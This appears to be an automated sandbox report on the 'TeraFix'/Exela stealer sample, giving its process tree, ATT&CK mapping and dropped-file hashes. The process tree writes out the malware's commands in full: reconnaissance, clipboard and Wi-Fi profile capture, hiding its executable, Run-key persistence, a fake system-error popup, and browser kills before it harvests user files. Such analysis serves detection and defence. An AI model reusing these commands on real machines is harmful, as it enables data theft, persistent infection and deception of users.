  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5656,i,13339050171625501339,6443265386828913767,262144 --variations-seed-version --mojo-platform-channel-handle=5680 /prefetch:8
  2⤵
  PID:1080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5728,i,13339050171625501339,6443265386828913767,262144 --variations-seed-version --mojo-platform-channel-handle=5908 /prefetch:8
  2⤵
  PID:3580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=5608,i,13339050171625501339,6443265386828913767,262144 --variations-seed-version --mojo-platform-channel-handle=6060 /prefetch:1
  2⤵
  PID:5392
- C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6504,i,13339050171625501339,6443265386828913767,262144 --variations-seed-version --mojo-platform-channel-handle=6520 /prefetch:8
  2⤵
  PID:1464
- C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6504,i,13339050171625501339,6443265386828913767,262144 --variations-seed-version --mojo-platform-channel-handle=6520 /prefetch:8
  2⤵
  PID:5216
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3428,i,13339050171625501339,6443265386828913767,262144 --variations-seed-version --mojo-platform-channel-handle=5736 /prefetch:8
  2⤵
  PID:4524
- C:\Users\Admin\Downloads\TeraFix Stealer.exe
  "C:\Users\Admin\Downloads\TeraFix Stealer.exe"
  2⤵
  - Executes dropped EXE
  PID:6004
- - C:\Users\Admin\Downloads\TeraFix Stealer.exe
    "C:\Users\Admin\Downloads\TeraFix Stealer.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5344
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:4408
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:4312
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        Suspicious use of AdjustPrivilegeToken
        
        PID:5244
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
      4⤵
      PID:384
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get Manufacturer
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6072
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "gdb --version"
      4⤵
      PID:4288
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      PID:4552
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:848
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
      4⤵
      PID:3492
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_ComputerSystem get Manufacturer
        5⤵
        
        PID:2116
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:4308
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:1952
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      PID:3908
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:4312
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""
      4⤵
      Hide Artifacts: Hidden Files and Directories
      PID:6056
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5244
    - - C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"
        5⤵
        Views/modifies file attributes
        
        PID:5292
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f"
      4⤵
      PID:5544
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f
        5⤵
        Adds Run key to start application
        
        PID:1620
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
      4⤵
      PID:2744
    - - C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
        5⤵
        
        PID:5636
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      PID:680
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:2624
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2692"
      4⤵
      PID:5864
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2692
        5⤵
        Kills process with taskkill
        
        PID:4016
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5968"
      4⤵
      PID:4792
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5968
        5⤵
        Kills process with taskkill
        
        PID:3804
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5552"
      4⤵
      PID:4496
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5552
        5⤵
        Kills process with taskkill
        
        PID:1284
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3640"
      4⤵
      PID:4584
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3640
        5⤵
        Kills process with taskkill
        
        PID:5616
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5492"
      4⤵
      PID:4324
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5492
        5⤵
        Kills process with taskkill
        
        PID:6052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4652"
      4⤵
      PID:60
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4652
        5⤵
        Kills process with taskkill
        
        PID:1460
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1000"
      4⤵
      PID:1140
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1000
        5⤵
        Kills process with taskkill
        
        PID:2400
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2928"
      4⤵
      PID:5400
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2928
        5⤵
        Kills process with taskkill
        
        PID:1168
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2052"
      4⤵
      PID:4288
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2052
        5⤵
        Kills process with taskkill
        
        PID:5244
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3580"
      4⤵
      PID:3872
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3580
        5⤵
        Kills process with taskkill
        
        PID:4656
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5392"
      4⤵
      PID:2696
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1620
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5392
        5⤵
        Kills process with taskkill
        
        PID:328
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
      4⤵
      PID:1892
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        5⤵
        
        PID:4680
      - C:\Windows\system32\chcp.com
        
        chcp
        6⤵
        
        PID:3492
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
      4⤵
      PID:2456
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        5⤵
        
        PID:2916
      - C:\Windows\system32\chcp.com
        
        chcp
        6⤵
        
        PID:2192
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:2252
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:3256
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
      4⤵
      Clipboard Data
      PID:1332
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        5⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:1808
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
      4⤵
      Network Service Discovery
      PID:4740
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:3904
    - - C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        5⤵
        
        PID:3580
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        5⤵
        Collects information from the system
        
        PID:4724
    - - C:\Windows\system32\net.exe
        
        net user
        5⤵
        
        PID:4704
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        6⤵
        
        PID:3896
    - - C:\Windows\system32\query.exe
        
        query user
        5⤵
        
        PID:5752
      - C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        6⤵
        
        PID:2052
    - - C:\Windows\system32\net.exe
        
        net localgroup
        5⤵
        
        PID:2620
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        6⤵
        
        PID:4284
    - - C:\Windows\system32\net.exe
        
        net localgroup administrators
        5⤵
        
        PID:3760
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        6⤵
        
        PID:4428
    - - C:\Windows\system32\net.exe
        
        net user guest
        5⤵
        
        PID:4796
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        6⤵
        
        PID:4508
    - - C:\Windows\system32\net.exe
        
        net user administrator
        5⤵
        
        PID:4280
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        6⤵
        
        PID:2360
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        5⤵
        
        PID:3324
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        5⤵
        Enumerates processes with tasklist
        
        PID:4984
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        5⤵
        Gathers network information
        
        PID:6000
    - - C:\Windows\system32\ROUTE.EXE
        
        route print
        5⤵
        
        PID:4296
    - - C:\Windows\system32\ARP.EXE
        
        arp -a
        5⤵
        Network Service Discovery
        
        PID:2004
    - - C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        5⤵
        System Network Connections Discovery
        Gathers network information
        
        PID:4960
    - - C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        5⤵
        Launches sc.exe
        
        PID:4684
    - - C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3644
    - - C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:540
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1000
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4992
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:2452
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:60
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:3960
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:3628
- C:\Users\Admin\Downloads\TeraFix Stealer.exe
  "C:\Users\Admin\Downloads\TeraFix Stealer.exe"
  2⤵
  - Executes dropped EXE
  PID:4544
- - C:\Users\Admin\Downloads\TeraFix Stealer.exe
    "C:\Users\Admin\Downloads\TeraFix Stealer.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1344
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:5324
- C:\Users\Admin\Downloads\TeraFix Stealer.exe
  "C:\Users\Admin\Downloads\TeraFix Stealer.exe"
  2⤵
  - Executes dropped EXE
  PID:4980
- - C:\Users\Admin\Downloads\TeraFix Stealer.exe
    "C:\Users\Admin\Downloads\TeraFix Stealer.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5152
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:1168
- C:\Users\Admin\Downloads\TeraFix Stealer.exe
  "C:\Users\Admin\Downloads\TeraFix Stealer.exe"
  2⤵
  - Executes dropped EXE
  PID:6068
- - C:\Users\Admin\Downloads\TeraFix Stealer.exe
    "C:\Users\Admin\Downloads\TeraFix Stealer.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5336
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:4496
- C:\Users\Admin\Downloads\TeraFix Stealer.exe
  "C:\Users\Admin\Downloads\TeraFix Stealer.exe"
  2⤵
  - Executes dropped EXE
  PID:1400
- - C:\Users\Admin\Downloads\TeraFix Stealer.exe
    "C:\Users\Admin\Downloads\TeraFix Stealer.exe"
    3⤵
    - Executes dropped EXE
    PID:5280
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:2788

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:4668

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
01cc3a42395638ce669dd0d7aba1f929

SHA1
89aa0871fa8e25b55823dd0db9a028ef46dfbdd8

SHA256
d0c6ee43e769188d8a32f782b44cb00052099222be21cbe8bf119469c6612dee

SHA512
d3b88e797333416a4bc6c7f7e224ba68362706747e191a1cd8846a080329473b8f1bfebee5e3fe21faa4d24c8a7683041705e995777714330316e9b563d38e41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
a81af0aa2e7d9566463100982f676edd

SHA1
0a7fb5e07f539a5105d4e87e122fe581b6f21c3e

SHA256
619a709b5ac5f0c05c0b9c0c3dfda5a1119bb00d42c8ea18b6618b3c18b6b034

SHA512
1dcc628d4d36b8bff16cc23ca26288ac68fa418e3ce2f327dbfbe7988a23e09b63431272f04abb590d6102630e7c13dcceefdc4be594ea5988a3a65a023ca497

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe57c92c.TMP

Filesize
3KB

MD5
36d092e2614c649636d38e4f8d3f03b9

SHA1
c3667ddf32e86aeb50ac2487c9e6f88192904cc5

SHA256
d68cba51dbfd28a52528b94aa467c0dd3128037d3725694f084c63dea4e13983

SHA512
c71ea5a3d5213d04a9733bd0e97f3643414d38a6c624da9bee62661bab3cfd4883effdb7dce878dc7baf595e638966a7dbf1e5c97e8945454657ef3b4da5f88a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

Filesize
107KB

MD5
40e2018187b61af5be8caf035fb72882

SHA1
72a0b7bcb454b6b727bf90da35879b3e9a70621e

SHA256
b3efd9d75856016510dd0bdb5e22359925cee7f2056b3cde6411c55ae8ae8ee5

SHA512
a21b8f3f7d646909d6aed605ad5823269f52fda1255aa9bb4d4643e165a7b11935572bf9e0a6a324874f99c20a6f3b6d1e457c7ccd30adcac83c15febc063d12

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

Filesize
40B

MD5
20d4b8fa017a12a108c87f540836e250

SHA1
1ac617fac131262b6d3ce1f52f5907e31d5f6f00

SHA256
6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

SHA512
507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
16KB

MD5
a518d08a509fbf74d315dbabb1e1313d

SHA1
3cab49a650db3a55b25c28f70660d49d14611651

SHA256
820376fe80e73e2f22647bd12bc5cc4145d68ca98a9b52b7ae49e743c0ee3e86

SHA512
093f298af30bc6d5d3944119e59357f52166e06c47c577619f5d4ca44276fd36bb45aa45432f2fea58af2c18e65b881a5465b243616f76009d786b39e6c5b54a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
36KB

MD5
8875f0a9d41f3c16e799a8301ac18b05

SHA1
ca96e55c4dc86672746eb325dbdbc6c1cacfb67b

SHA256
f7cbddd55eb37e1a39abcf582ae296a28af54ae2c41c27a25044ea915b9c139e

SHA512
5305aa6fd1d497087ab7bf568f6c933a1e1f9ddf1eb52da1324dec0bad401d434026c541bad34ae773772487fd59d2caed166318483743494934641d121f71a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

Filesize
22KB

MD5
7f1c5bb93819bcfb5fd5d62f002bc674

SHA1
b0226f466964a9354b6f76f18e2a96aad6fe7223

SHA256
878c718b19409577c8238e86789ec19412bff4067dc3340cde9168b0fcc4a267

SHA512
350a5c0447611fd4ff2a2d642d59622a8252463232ce9d34ad3ac1b618e3c2f7b5ef60809696a070656af99f3afa80846506bc336c9f829ec3e4a459d49093e4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
49KB

MD5
4b48ed5c562909488cd4a4f13d822807

SHA1
e8fc3c27f15de380ce1eca9b94e5cfa71f5e6fb9

SHA256
243ba5d035267096b389d344dab92801e728dc0bf99bd79f68a4fbc75f380d94

SHA512
4769342800867bebc6b955462fffe5d9655cb92da34f473e7c414d60a48a77be841997e3eedf3672a344e94bbbb83dc78c070c90b61ddb215f52ebc43bf5a08c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
40KB

MD5
8bd016e237c8562fb07374bc2d506d8f

SHA1
3a9c8831bd598e8843c4ff2d5c51d73481eb9888

SHA256
d678d2a32087af76fcada20c2d4846fc35508d019286f23b470025a0ce727736

SHA512
2f8937264e99ed0a4c61b581fb8256a3c1c96f12afb1d90e14ece9bc5ea6d94f58ebceaa6d0b70da35ad9df2f444f05b5c6240071708a6705e4802d53ba07cd2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

Filesize
2KB

MD5
824a23fd5afec034c87b0128076f995b

SHA1
0e6dfba21ec1f7203fb9955c59d11c1579be14c9

SHA256
08ace9975874d5d1f636f075b4b19686aac51f72cc3abb307af3900be0a79f1f

SHA512
f0627b385d3db89fd81347196991fb63c8cd920cfa22cb9d29cf4ad843908cf45643a303cddec3a462951fadcb36a4036b5eb5b7eeb7f75e8cf8ec8e74642fff

Download Submit
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\CompleteConfirm.pdf

Filesize
480KB

MD5
a9e901b09a3af3d66aa5b5a0d843d2f9

SHA1
8d274602c32ceddd0ae83ac4dbcb5e5721e14d1b

SHA256
c7a510588b1fc6923f22a62fe636dd27ef7476e9928c00e7d18f51475e0a8d41

SHA512
d06ace8fa4c02b82e5ed5e1476d1493e21683f76807e8eef72d87922c11954c95d3458f90480252279ca6083265b6e4b114dca204776c0a52586409940b6d96e

Download Submit
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\OutDisconnect.xlsx

Filesize
10KB

MD5
88592e80a141203bfbeedc46abcd20c2

SHA1
b8c29887849887f458ed485a24a4c18fb80d37ac

SHA256
87a7f4d44eef3159d337139db2b23ce455af834b9c692d24903e5b22fb4eba8d

SHA512
2a22e9157f1099a8ecc24eda56f7e73f7f50b189a916cef082c51bf8c0b5b29d1482ab42deabbaaf593f49312f40c63fc2fe20f653d751820a6fa4545d6b9d31

Download Submit
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\PushGet.jpg

Filesize
407KB

MD5
759b69549568f572e245093d606d4da0

SHA1
37988939cc00550aece8b4ba291d4bcea186cad4

SHA256
be5eae9c0c63c909b46986979cae329b02a5e25e7cc29815647b47d3062bbd55

SHA512
07823dfd6645763ff8db523d694f10d9488e1c4f437b0b0564a093cca780a216222bb361518987d5e290abd81482ba576e175d662d2943afe141b880a6afb25e

Download Submit
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\WriteBackup.ex_

Filesize
359KB

MD5
2eedd01ecc68815b58a3b1ef83eaae59

SHA1
de9e4adbd91b7aa7bb74e32d487c48472bff385d

SHA256
53b2d5a94085fee0e34e89b50f72452d46cf1b3c0960929b2ffcfd4f17eba9c9

SHA512
ae77f9432f170d9a07f63cf18aa1384fa56405a390ec76eb37ee183359f94c815f7e051df6ff8d1e11e5b292d5a81bb3eab794039ee70904c579f4134aa71d0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Documents\CompressComplete.xlsx

Filesize
10KB

MD5
8dc18363e6a7770b7e3d0bb47fbcae0a

SHA1
44c4607e697a25c53395b2b48b627bd82554bd66

SHA256
d1689860f1fbfdf19cff3145400b476ef906ea82c2229e3799194e8d028b22ed

SHA512
72feddc76375a912c994f6ea3b375f137acfca8281972ce8dcae39c521190beb80d5faf7c03a9a4ef06f641bee55b4c0d6cc318b274065c91a368945fd1bfa3f

Download Submit
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Documents\ExpandUnpublish.doc

Filesize
471KB

MD5
332ebd75a4e19a3a2bfcf9660d7613f3

SHA1
f04425e90a9e1e69678877c40b3383af510db9f3

SHA256
d17a8503317bb5cc27e5dec5ec3cfb3d7425c79000ca8449f234df225896cfa5

SHA512
ee621712f138b5a5a9d9877e09e5e783f624cd02688cf5469664e3eb3989cd0c3f6efa747e24566d2fc41b079acdb90f6ef416b913285e65e751141e78ff08db

Download Submit
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Documents\LockFormat.xlsx

Filesize
10KB

MD5
97fc03c5947f8878e82a9b2d71ddf74e

SHA1
64d0f66b0a099b9ec59d0327709942e2189c5f5f

SHA256
13bdaf5426e62f38c3cc973f0de69a691725873f0491b2ed6d6944a5d5d07088

SHA512
103909933ebc30b38539b3b7be0127976b06cc5811454a82964c8c69100ed17bc5a3d572696e049a1368d0fa2964b86c1ab862a062bfe61397649ef552b132d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Documents\LockImport.xls

Filesize
552KB

MD5
64cbfe1c4a8395f4aa82f1c8dcdcaaa3

SHA1
ff7b0829b6926a5d7e81e5aecff7b158c7a812c6

SHA256
3f0c736a3a9929f2c1ec3888d1a5dbe5d37532675ed64430b6982e16a0b1b0df

SHA512
e0514045cba45705f7372db3b59abbb7ed525054912c71dfce07cd2533c24f92147bda692b5347bbb904732cd5ab0bc6c7f1c18247d726a82553d4be212b8495

